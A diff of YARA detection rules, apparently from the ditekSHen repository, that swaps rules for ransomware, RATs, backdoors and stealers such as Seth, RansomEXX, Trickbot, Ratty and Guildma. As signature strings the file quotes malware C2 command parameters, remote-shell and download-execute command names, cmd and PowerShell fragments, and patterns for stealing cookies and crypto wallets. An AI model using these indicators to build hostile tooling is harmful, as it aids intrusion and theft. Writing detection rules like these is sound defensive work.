"316c50cc-964e-5d24-b169-7a09fdf61638" - date = "2024-09-06" - modified = "2024-09-06" + id = "ef710c21-5c64-513e-b882-b5768478976e" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5690-L5703" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b733b7aa3ba1195807fb728453c0f3f4df2177836054af6f7a863e14058884cb" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3722-L3752" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "91764dabfb40cb51914110de229ddb00cd565078fef83c825f7a86fa502fda37" score = 75 - quality = 25 + quality = 73 tags = "FILE" strings: - $s1 = "C:\\$MSIRecycle.Bin\\" fullword ascii - $s2 = "Range: bytes=%d-" fullword ascii - $s3 = "GET%sHTTP/1.1" fullword ascii - $s4 = "DllServer.dll" fullword ascii - $s5 = ".Bin\\bnch" ascii - $s6 = "User-Agent: wget" fullword ascii + $cmd1 = "Cmd_UPDATE" fullword ascii + $cmd2 = "Cmd_IDLE" fullword ascii + $cmd3 = "Cmd_EXE" fullword ascii + $cmd4 = "Cmd_VBS" fullword ascii + $cmd5 = "Cmd_JS" fullword ascii + $cmd6 = "Cmd_PWS" fullword ascii + $cmd7 = "Cmd_RAT" fullword ascii + $cmd8 = "Cmd_UNINST" fullword ascii + $cmd9 = "Cmd_RunDll" fullword ascii + $s1 = "ANSWER_OK" fullword ascii + $s2 = "GatherDFiles" ascii + $s3 = "CommandCd" fullword ascii + $s4 = "URL_GetCmd" fullword ascii + $s5 = "\"host\": \"{0}\", \"domain\": \"{1}\", \"user\": \"{2}\"" wide + $s6 = "pc_dns_host_name" wide + $s7 = "\"adinfo\": { \"adinformation\":" wide + $e1 = "//e:vbscript" wide + $e2 = "//e:jscript" wide + $e3 = "/c rundll32.exe" wide + $e4 = "/C powershell" wide + $e5 = "C:\\Windows\\System32\\cmd.exe" wide + $e6 = "echo del /f" wide + $e7 = "AT.U() {0}. format" wide condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and (5 of ($cmd*) or 5 of ($s*) or all of ($e*) or 7 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Infinitylock : FILE +rule DITEKSHEN_MALWARE_Win_CHUWI_Seth : FILE { meta: - description = "Detects InfinityLock ransomware" + description = "First sighting on 2020-01-05 didn't include ransomware artificats. Second sighting on 2020-01-24 with several correlations between the two samples now include ransomware artifacts." author = "ditekSHen" - id = "7a66cc19-c635-580b-abc2-b58bd48673bd" - date = "2024-09-06" - modified = "2024-09-06" + id = "62af3cd3-59c3-580b-9d66-71fd4acfaf17" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5705-L5723" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "634759f1c2d48becebc9c87e146e898524071738f74b7001b112dc793bcb581c" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3754-L3801" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e6e3f5e9af093268667f67fec2176a943b35721e9f220804e176c6b5a3bb24e1" score = 75 quality = 73 tags = "FILE" + snort2_sid = "920103-920105" + snort3_sid = "920101-920103" strings: - $s1 = "_Encrypted$" fullword ascii - $s2 = "PublicKeyToken=" fullword ascii nocase - $s3 = "GenerateHWID" fullword ascii - $s4 = "CreateKey" fullword ascii - $d1 = "ProgrammFiles" fullword ascii - $d2 = "OneDrive" fullword ascii - $d3 = "ProgrammsX86" fullword ascii - $d4 = "UserDirs" fullword ascii - $d5 = "B_Drive" fullword ascii - $pdb1 = "F:\\DESKTOP!\\ChkDsk\\ChkDsk\\obj\\" ascii - $pdb2 = "\\ChkDsk\\obj\\Debug\\PremiereCrack.pdb" ascii + $cmd1 = "shell_command" fullword ascii + $cmd2 = "check_command" fullword ascii + $cmd3 = "down_exec" fullword ascii + $cmd4 = "open_link" fullword ascii + $cmd5 = "down_exec" fullword ascii + $cmd6 = "exe_link" fullword ascii + $cmd7 = "shellCommand" fullword ascii + $cmd8 = "R_CMMAND" fullword ascii + $cnc1 = "/check_command.php?HWID=" ascii + $cnc2 = "&act=get_command" ascii + $cnc3 = "/get_command.php?hwid=" ascii + $cnc4 = "&command=down_exec" ascii + $cnc5 = "&command=message" ascii + $cnc6 = "&command=open_link" ascii + $cnc7 = "&command=down_exec" ascii + $cnc8 = "&command=shell" ascii + $pdb = "\\Users\\CHUWI\\Documents\\CPROJ\\Downloader\\svchost" ascii + $rcnc1 = "inc/check_command.php" ascii + $rcnc2 = "inc/get_command.php" ascii + $rcnc3 = "php?btc" ascii + $rcnc4 = "php?hwid" ascii + $x1 = "> %USERPROFILE%\\Desktop\\HOW_DECRYPT_FILES.seth.txt" ascii + $x2 = "/C dir /b %USERPROFILE%\\Documents > %temp%\\doc.txt" ascii + $x3 = "/C dir /b %USERPROFILE%\\Desktop > %temp%\\desk.txt" ascii + $x4 = "/C dir /b %USERPROFILE%\\Downloads > %temp%\\downs.txt" ascii + $x5 = "/C dir /b %USERPROFILE%\\Pictures > %temp%\\pics.txt" ascii + $x6 = "for /F \"delims=\" %%a in ('mshta.exe \"%~F0\"') do set \"HTA=%%a\"" ascii + $x7 = "\\svchost.exe" fullword ascii + $x8 = ".seth" fullword ascii + $x9 = "MyAgent" fullword ascii condition: - uint16(0)==0x5a4d and (( all of ($s*) and 1 of ($d*)) or (4 of ($d*) and 2 of ($s*)) or ( any of ($pdb*) and 1 of ($s*) and 1 of ($d*))) + uint16(0)==0x5a4d and ($pdb or 5 of ($cmd*) or 4 of ($cnc*) or all of ($rcnc*) or 5 of ($x*) or 8 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Mountlocker : FILE +rule DITEKSHEN_MALWARE_Win_Gulpix : FILE { meta: - description = "Detects MountLocker ransomware" + description = "Detects Gulpix/HyperPlus backddor" author = "ditekSHen" - id = "0590d08d-1ee8-5dfe-af12-15b149acd2d6" - date = "2024-09-06" - modified = "2024-09-06" + id = "b3dfd1d9-42fe-57d4-8047-135103689be7" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5725-L5740" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "30bc601fef60cc1c9d8bff5dd3f8a53214f088b74eb24fe2369f5664613e0eaf" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3803-L3832" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "5026726f093b31b444fc934ac1446b6c25f182b8714a37da05f4498f32a9a65f" score = 75 - quality = 75 + quality = 50 tags = "FILE" strings: - $s1 = "] locker.dir.check > " ascii wide - $s2 = "] locekr.kill." ascii wide - $s3 = "] locker.worm" ascii wide - $s4 = "%CLIENT_ID%" fullword ascii - $s5 = "RecoveryManual.html" ascii wide - $s6 = "RECOVERY MANUAL" ascii - $s7 = ".ReadManual.%0.8X" ascii wide - $s8 = "/?cid=%CLIENT_ID%" ascii + $x1 = "MainServer.dll" fullword ascii + $x2 = "NvSmartMax.dat" fullword wide + $x3 = "NvSmartMax.dll" fullword wide + $x4 = "http://+:80/FD873AC4-CF86-4FED-84EC-4BD59C6F17A7/" fullword wide + $s1 = "IP retriever" fullword wide + $s2 = "\\cmd.exe" fullword wide + $s3 = "\\msnetwork-cache.db" fullword wide + $s4 = "http://+:" wide + $s5 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" fullword wide + $s6 = "\\Microsoft\\Windows\\DiskCleanup\\SilentCleanup" ascii + $s7 = "Got a unknown request for %ws" wide + $s8 = "HttpReceiveRequestEntityBody failed with %lu" wide + $s9 = "FD873AC4-CF86-4FED-84EC-4BD59C6F17A7" wide condition: - uint16(0)==0x5a4d and 3 of them + uint16(0)==0x5a4d and ( all of ($x*) or 6 of ($s*) or (2 of ($x*) and 4 of ($s*)) or (2 of them and pe.exports("daemon") and pe.exports("run") and pe.exports("session") and pe.exports("work"))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Pingback : FILE +rule DITEKSHEN_MALWARE_Linux_Ransomexx : FILE { meta: - description = "Detects PingBack ICMP backdoor" - author = "ditekSHen" - id = "ecb313b6-f923-5b6d-a4d7-a4650817ed84" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects RansomEXX ransomware" + author = "ditekshen" + id = "b449afc7-9055-55ed-a876-316d1aea8fee" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5742-L5761" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "c5fa9ecefca1188ba5e81c0518f74023884ad0f66718fc030601cb458bdf2f12" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3834-L3858" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "c233ccc3e741cb2c53f182c48093e41595a82a3f4e5bdb1dc0204f1f57b96c2a" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Linux.Ransomware.RansomEXX" strings: - $s1 = "Sniffer ok!" fullword ascii - $s2 = "recv icmp packet!" fullword ascii - $s3 = "WSASocket() failed: %d" fullword ascii - $s4 = "file on remote computers success" ascii - $s5 = "listen port error!" fullword ascii - $s6 = "\\PingBackService" ascii - $c1 = "exec" fullword ascii - $c2 = "rexec" fullword ascii - $c3 = "exep" fullword ascii - $c4 = "download" fullword ascii - $c5 = "upload" fullword ascii - $c6 = "shell" fullword ascii + $c1 = "crtstuff.c" fullword ascii + $c2 = "cryptor.c" fullword ascii + $c3 = "ransomware.c" fullword ascii + $c4 = "logic.c" fullword ascii + $c5 = "enum_files.c" fullword ascii + $c6 = "readme.c" fullword ascii + $c7 = "ctr_drbg.c" fullword ascii + $s1 = "regenerate_pre_data" fullword ascii + $s2 = "g_RansomHeader" fullword ascii + $s3 = "CryptOneBlock" fullword ascii + $s4 = "RansomLogic" fullword ascii + $s5 = "CryptOneFile" fullword ascii + $s6 = "encrypt_worker" fullword ascii + $s7 = "list_dir" fullword ascii + $s8 = "ctr_drbg_update_internal" fullword ascii condition: - uint16(0)==0x5a4d and (3 of ($s*) or all of ($c*) or (4 of ($c*) and 2 of ($s*))) + uint16(0)==0x457f and (5 of ($c*) or 6 of ($s*) or (3 of ($c*) and 3 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Bazarloader : FILE +rule DITEKSHEN_MALWARE_Win_Trickbotmodule : FILE { meta: - description = "Detects BazarLoader variants" - author = "ditekSHen" - id = "6282df59-7244-501f-bb60-09a2a519bd47" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects Trickbot modules" + author = "ditekshen" + id = "c56c664f-5928-5e2e-ab06-0b9d504981be" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5763-L5776" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "8febd1355bc03f71794ffb8d51cbb112e8acd2d26fec5bb736a388d5384e7747" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3860-L3881" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "4d06653dad5f8a18598855212548364b3c3d2b68b99784846b494fcb1d1c8df9" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "Startdelay for %d ms to avoid some dynamic AV detects!" ascii - $s2 = "Use Debug for moving faster!" ascii - $s3 = "Logging Mutex %s to %s" ascii - $s4 = "FIRST AND ONLY COPY RUNNING! Mutex %s" ascii - $s5 = "the most secret 3d GetWinApiPointers line in the world!" ascii - $s6 = "[+] makeMD5hash. " ascii + $mc = "<moduleconfig>" ascii + $s1 = "<autostart>" ascii + $s2 = "<nohead>" ascii + $s3 = "<needinfo" ascii + $s4 = "<conf ctl" ascii + $s5 = "<limit>" ascii + $w1 = "<sys>yes</sys>" ascii + $w2 = "<sys>no</sys>" ascii + $w3 = "<autostart>yes</autostart>" ascii + $w4 = "<autostart>no</autostart>" ascii + $w5 = "<nohead>yes</nohead>" ascii + $w6 = "<nohead>no</nohead>" ascii + $w7 = /<limit>\d+<\/limit>/ ascii + $w8 = "<moduleconfig> </moduleconfig" ascii condition: - uint16(0)==0x5a4d and 3 of ($s*) + uint16(0)==0x5a4d and $mc and (2 of ($s*) or (1 of ($s*) and 1 of ($w*)) or 1 of ($w*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Coinminer01 : FILE +rule DITEKSHEN_MALWARE_Win_Gaudox : FILE { meta: - description = "Detects coinmining malware" - author = "ditekSHen" - id = "739e7cea-c6b6-5add-86d4-382b00e2b645" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects Gaudox RAT" + author = "ditekshen" + id = "c60ac433-20a1-5f01-9447-fa99621bd9e2" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5778-L5790" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "31a7531ecc7b8a35ba882c17d15bd3581e65b4b99dd3a7cb8bca8f6edf204114" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3883-L3893" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "117ee89e264067ab3e695688872bbe7d83963731e877d04ac7e2505e64f6e793" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "-o pool." ascii wide - $s2 = "--cpu-max-threads-hint" ascii wide - $s3 = "-P stratum" ascii wide - $s4 = "--farm-retries" ascii wide - $dl = "github.com/ethereum-mining/ethminer/releases/download" ascii wide + $s1 = "hdr=%s&tid;=%s&cid;=%s&trs;=%i" ascii wide + $s2 = "\\\\\\\\.\\\\PhysicalDrive%u" ascii wide condition: - uint16(0)==0x5a4d and (3 of ($s*) or ($dl)) + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_PUA_Win_Ultrasurf : FILE +rule DITEKSHEN_MALWARE_Win_Phobos : FILE { meta: - description = "Detects UltraSurf / Ultrareach PUA" - author = "ditekSHen" - id = "ba0f6867-bddc-5e72-978c-8e29b1b6b709" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects Phobos ransomware" + author = "ditekshen" + id = "7bf659ef-f2a1-5ee2-a334-c233e26a2526" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5792-L5807" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d8d17b1bf20c12f864697d3dd66f345a8b93e2a75f0489b58b23b7f5264b6be3" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3895-L3908" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "bbf8eef0863e9d6423b3b0f938561b2be486b92b4f59b5d0b67f52dba536a582" score = 75 - quality = 75 + quality = 25 tags = "FILE" strings: - $s1 = "Ultrareach Internet Corp." ascii - $s2 = "UltrasurfUnionRectUrlFixupWUse Proxy" ascii - $s3 = "Ultrasurf UnlockFileUrlEscapeWUser-Agent" ascii wide - $s4 = "Ultrasurf0#" ascii - $m1 = "main.bindata_read" fullword ascii - $m2 = "main.icon64_png" fullword ascii - $m3 = "main.setProxy" fullword ascii - $m4 = "main.openbrowser" fullword ascii + $x1 = "\\\\?\\UNC\\\\\\e-" fullword wide + $x2 = "\\\\?\\ :" fullword wide + $x3 = "POST" fullword wide + $s1 = "ELVL" fullword wide + $s2 = /SUP\d{3}/ fullword wide + $s3 = { 41 31 47 ?? 41 2b } condition: - uint16(0)==0x5a4d and (2 of ($s*) or ( all of ($m*) and 1 of ($s*))) + uint16(0)==0x5a4d and all of ($x*) and 1 of ($s*) } import "pe" -rule DITEKSHEN_MALWARE_Win_Hello : FILE +rule DITEKSHEN_MALWARE_Win_Ratty : FILE { meta: - description = "Hunt for Hello / WickrMe ransomware" - author = "ditekSHen" - id = "99c11aab-8a3a-5e10-9af0-542e55129d51" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects Ratty Java RAT" + author = "ditekshen" + id = "87719e28-dfe7-5366-8d90-65e6c0c6fb4f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5809-L5820" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "f52f12eb38613f5afd5258b5263c6e6e2d9db6c9659a769f896a2bb66564fa69" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3910-L3929" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "d90bca1b18023da8e60cb6ca86d1c562bff3867c6d5cf893dce605ebb92b9637" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "DeleteBackupFiles" ascii wide - $s2 = "GetEncryptFiles" ascii wide - $s3 = "DeleteVirtualDisks" ascii wide - $s4 = "DismountVirtualDisks" ascii wide + $s1 = "/rat/RattyClient.class" ascii + $s2 = "/rat/ActiveConnection.class" ascii + $s3 = "/rat/attack/" ascii + $s4 = "/rat/gui/swing/Ratty" ascii + $s5 = "/rat/packet/PasswordPacket" ascii + $s6 = "/rat/packet/" ascii + $e1 = "/engine/Keyboard.class" ascii + $e2 = "/engine/IMouseListener.class" ascii + $e3 = "/engine/Screen$ResizeBehavior.class" ascii + $e4 = "/engine/fx/ISoundListener.class" ascii + $e5 = "/engine/net/TCPServer.class" ascii + $e6 = "/engine/noise/PerlinNoise.class" ascii condition: - uint16(0)==0x5a4d and 3 of them + ( uint16(0)==0x5a4d or uint16(0)==0xcfd0 or uint16(0)==0x4b50) and (3 of ($s*) or all of ($e*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Buterat : FILE +rule DITEKSHEN_MALWARE_Win_Fatduke : FILE { meta: - description = "Detects ButeRAT" + description = "Detects FatDuke" author = "ditekSHen" - id = "74f63d61-6589-5fb1-864a-3a02ddd57ebc" - date = "2024-09-06" - modified = "2024-09-06" + id = "dc80c0f0-c61c-5f0c-841b-3a75e8a1cef3" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5822-L5839" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "c3d93e8dc1bde8e77c11586c8d8b67d137ef2c4791e12269f1af310fbe14832b" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3931-L3946" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a7923d15b10098e9402614fe7107a6ba1d71512efa6e462d522ef64e13f82b47" score = 75 - quality = 73 + quality = 75 tags = "FILE" strings: - $x1 = "TVqQAAMAA" ascii - $s1 = "ipinfo.io/geo" wide - $s2 = "/index.php" wide - $s3 = "Copy-Item -Path" wide - $s4 = ";Start-Process" wide - $s5 = "Microsoft\\Windows\\Start Menu\\Programs\\Startup" wide - $s6 = "LOCALAPPDATA" fullword wide - $s7 = "passwords.json" wide - $s8 = "Scripting.FileSystemObject" fullword wide - $z1 = /(edge|chrome|opera|exodus|jaxx|atomic|coinomi)\.zip/ ascii wide nocase + $s1 = "\\\\?\\Volume" fullword ascii + $s2 = "WINHTTP_AUTOPROXY_OPTIONS@@PAUWINHTTP_PROXY_INFO@@" ascii + $s3 = "WINHTTP_CURRENT_USER_IE_PROXY_CONFIG@@" ascii + $s4 = "Cannot write a Cannot find the too long string mber of records Log malfunction! Cannot create ain an invalid ra Internal sync iright function iWaitForSingleObjffsets" ascii + $pattern = "()$^.*+?[]|\\-{},:=!" ascii + $b64 = "eyJjb25maWdfaWQiOi" wide condition: - uint16(0)==0x5a4d and ((1 of ($x*) or 1 of ($z*)) and (4 of ($s*)) or (6 of ($s*)) or (#z1>4 and 2 of them )) + uint16(0)==0x5a4d and (3 of ($s*) or ($b64 and 2 of them ) or (#pattern>3 and 2 of them )) } import "pe" -rule DITEKSHEN_MALWARE_Win_Cookiestealer : FILE +rule DITEKSHEN_MALWARE_Win_Miniduke : FILE { meta: - description = "Detects generic cookie stealer" + description = "Detects MiniDuke" author = "ditekSHen" - id = "64c6c59d-4046-5949-bf71-22a5f6bfa209" - date = "2024-09-06" - modified = "2024-09-06" + id = "947cd414-d19d-5543-8961-94aef69cc94e" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5841-L5857" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "9cc406ae078e37430b3cf10954c02014b9760bc887344842e724df735d1d9808" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3948-L3969" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "c3ab139b4fda2ff9678ceecbdf5ac0c57536bd658f62aa9d19610028b0a5f92c" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "([\\S]+?)=([^;|^\\r|^\\n]+)" fullword ascii - $s2 = "(.+?): ([^;|^\\r|^\\n]+)" fullword ascii - $s3 = "Set-Cookie: ([^\\r|^\\n]+)" fullword ascii - $s4 = "cmd.exe /c taskkill /f /im chrome.exe" fullword ascii - $s5 = "FIREFOX.EXE|Google Chrome|IEXPLORE.EXE" ascii - $pdb1 = "F:\\facebook_svn\\trunk\\database\\Release\\DiskScan.pdb" fullword ascii - $pdb2 = "D:\\Projects\\crxinstall\\trunk\\Release\\spoofpref.pdb" fullword ascii - $ua1 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" fullword ascii - $ua2 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" fullword ascii + $s1 = "DefPipe" fullword ascii + $s2 = "term %5d" fullword ascii + $s3 = "pid %5d" fullword ascii + $s4 = "uptime %5d.%02dh" fullword ascii + $s5 = "login: %s\\%s" fullword ascii + $s6 = "Software\\Microsoft\\ApplicationManager" ascii + $s7 = { 69 64 6c 65 ?? 00 73 74 6f 70 ?? 00 61 63 63 65 70 74 ?? 00 63 6f 6e 6e 65 63 74 ?? 00 6c 69 73 74 65 6e ?? 00 } + $net1 = "salesappliances.com" ascii + $net2 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36" fullword ascii + $net3 = "http://10." ascii + $net4 = "JiM9t8g7j8KoJkLJlKqka8dbo7q5z4v5u3o4z" ascii + $net5 = "application/octet-stream" ascii + $net6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" ascii condition: - uint16(0)==0x5a4d and (( all of ($s*) and 1 of ($pdb*) and 1 of ($ua*)) or ( all of ($ua*) and 1 of ($pdb*) and 2 of ($s*))) + uint16(0)==0x5a4d and (5 of ($s*) or 4 of ($net*) or 7 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Bitcoingrabber : FILE +rule DITEKSHEN_MALWARE_Win_Polyglotduke : FILE { meta: - description = "Detects generic bitcoin stealer" + description = "Detects PolyGlotDuke" author = "ditekSHen" - id = "f73b58da-1db5-5767-ae0a-074648e30966" - date = "2024-09-06" - modified = "2024-09-06" + id = "01ac90db-35f6-5192-8630-81000573b4f9" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5859-L5875" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "2dc762525c1fbf25517df52f0561d96d7469bf1367eada31c236fc313001c6cb" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3971-L3986" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "c1fb8ea1d21768cbd65bd7b91e3f817fa97a0a933b511dff2ae4d5db49bdb2ec" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide - $s2 = "Bitcoin-Grabber" ascii - $s3 = "Bitcoin_Grabber" ascii - $s4 = "encrypt resources [compress]T" fullword ascii - $s5 = "code control flow obfuscationT" fullword ascii - $s6 = "\\Users\\lakol\\Desktop\\a\\Crypto Currency Wallet Changer\\" ascii - $pat1 = "\\b(bc1|[13])[a-zA-HJ-NP-Z0-9]{26,35}\\b" fullword wide - $pat2 = "\\b0x[a-fA-F0-9]{40}\\b" fullword wide - $pat3 = "\\b4([0-9]|[A-B])(.){93}\\b" fullword wide + $s1 = { 48 b9 ff ff ff ff ff ff ff ff 51 48 23 8c 24 ?? 00 00 00 48 89 8C 24 00 00 00 00 } + $s2 = { 56 be ff ff ff ff 56 81 e6 7f } + $s3 = { 48 8b 05 19 ?4 4b 00 48 05 48 83 00 00 4c 8b 44 24 50 8b 54 24 48 48 8b } condition: - uint16(0)==0x5a4d and 4 of ($s*) or ( all of ($pat*) and 2 of ($s*)) + uint16(0)==0x5a4d and ( all of ($s*)) or (2 of them and pe.exports("InitSvc")) } import "pe" -rule DITEKSHEN_MALWARE_Win_FOXGRABBER : FILE +rule DITEKSHEN_MALWARE_Win_Guidlma : FILE { meta: - description = "Detects FOXGRABBER utility" + description = "Detects Guildma" author = "ditekSHen" - id = "b98e501c-e9c6-5fcc-bfa0-9475ce32864c" - date = "2024-09-06" - modified = "2024-09-06" + id = "135ddc6a-5001-54c0-a66c-3e0e5fe6319f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5877-L5890" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "5ecba516f1155bdcccf83b0a034b11d8eac8619d4c3326fdbc76082fbe4daf02" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3988-L4006" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "11a0d9c67139627b6820c928840d816ed22b48452ce0b2f856c86c183cdfc8ab" score = 75 - quality = 75 + quality = 25 tags = "FILE" strings: - $s1 = "start grabbing" wide - $s2 = "end grabbing in" wide - $s3 = "error of copying files from comp:" wide - $s4 = "\\Firefox\\" wide nocase - $pdb1 = "\\obj\\Debug\\grabff.pdb" ascii - $pdb2 = "\\obj\\Release\\grabff.pdb" ascii + $v1_1 = "marxvxinhhm98.dll" fullword wide + $v1_2 = "marxvxinhhmxa.gif" fullword wide + $v1_3 = "marxvxinhhmxb.gif" fullword wide + $v1_4 = "c:\\programdata" fullword wide + $v1_5 = "\\tempa\\" fullword wide + $v2_1 = 